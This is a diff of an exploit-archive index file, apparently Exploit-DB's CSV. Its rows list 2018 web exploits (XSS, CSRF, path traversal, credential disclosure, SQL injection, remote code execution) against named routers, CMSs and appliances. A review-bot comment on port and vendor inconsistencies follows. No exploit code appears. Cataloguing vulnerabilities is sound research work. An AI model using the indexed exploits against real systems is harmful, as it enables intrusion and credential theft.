@ -39764,6 +39771,7 @@ id,file,description,date,author,type,platform,port
45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
45209,exploits/hardware/webapps/45209.go,"Mikrotik WinBox 6.42 - Credential Disclosure (golang)",2018-08-17,"Maxim Yefimenko",webapps,hardware,
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux,
@ -39802,8 +39810,10 @@ id,file,description,date,author,type,platform,port
45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
45198,exploits/linux/webapps/45198.rb,"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443
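Review bot: The new 45212 row records port 443 while the exploit it indexes defaults to `--port 8001` and the existing ASUSTOR row 45200 a few lines above lists 8001 for the same service, so one of these is wrong and they should be reconciled. The 45212 description also drops the vendor ('ADM 3.1.2RHG1' versus 'ASUSTOR ADM 3.1.0.RFQ3' in 45200), which makes the index hard to search by product. The 45209 WinBox row leaves the port blank although the Go exploit dials `:8291`, and the sibling entry 45170 for the same bug is filed under windows/remote while this one goes to hardware/webapps; the platform/type pair should be consistent across the two.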
